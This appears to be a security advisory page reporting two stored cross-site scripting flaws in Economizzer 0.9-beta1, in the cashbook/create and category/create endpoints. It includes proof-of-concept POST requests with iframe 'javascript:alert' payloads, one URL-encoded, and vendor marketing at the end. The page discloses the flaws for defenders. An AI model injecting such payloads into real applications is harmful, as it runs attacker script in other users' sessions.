Lucene search
K

📄 Economizzer 0.9-beta1 Cross Site Scripting

🗓️ 19 May 2025 00:00:00Reported by Ron EType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 79 Views

Stored XSS in Economizzer 0.9-beta1 via cashbook/create and category/create; scripts execute on view.

Code
A persistent cross-site scripting (XSS) vulnerability exists in gugoan's
    Economizzer v.0.9-beta1 The application fails to properly sanitize
    user-supplied input when creating a new cash book entry via the
    *cashbook/create* endpoint. An attacker can inject malicious JavaScript
    payloads that are permanently stored and later executed in the context of
    any user who views the affected entry.
    
    
    
    https://<host>/web/cashbook/create
    
    
    
    POST /web/cashbook/create HTTP/2
    
    Host: <host>
    
    -
    
    
    
    ------WebKitFormBoundaryM93AAtGLA59fTnSU
    
    --snip--
    
    
    
    <iframe src="javascript:alert(4)">
    
    ------WebKitFormBoundaryM93AAtGLA59fTnSU
    
    Content-Disposition: form-data; name="Cashbook[is_pending]"
    
    
    
    --snip--
    
    
    
    ------- second advisory --------
    
    A persistent cross-site scripting (XSS) vulnerability exists in gugoan's
    Economizzer v.0.9-beta1. The application fails to properly sanitize
    user-supplied input when creating a new category via the
    *category/create *endpoint.
    An attacker can inject malicious JavaScript payloads that are permanently
    stored and later executed in the context of any user who views the affected
    entry.
    
    https://<host>/web/category/create
    
    POST /web/category/create HTTP/2
    
    Host: <host>
    
    
    
    --snip--
    
    Category%5Bdesc_category%5D=%3Ciframe+src%3D%22javascript%3Aalert%283%29%22%3E
    --snip--

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation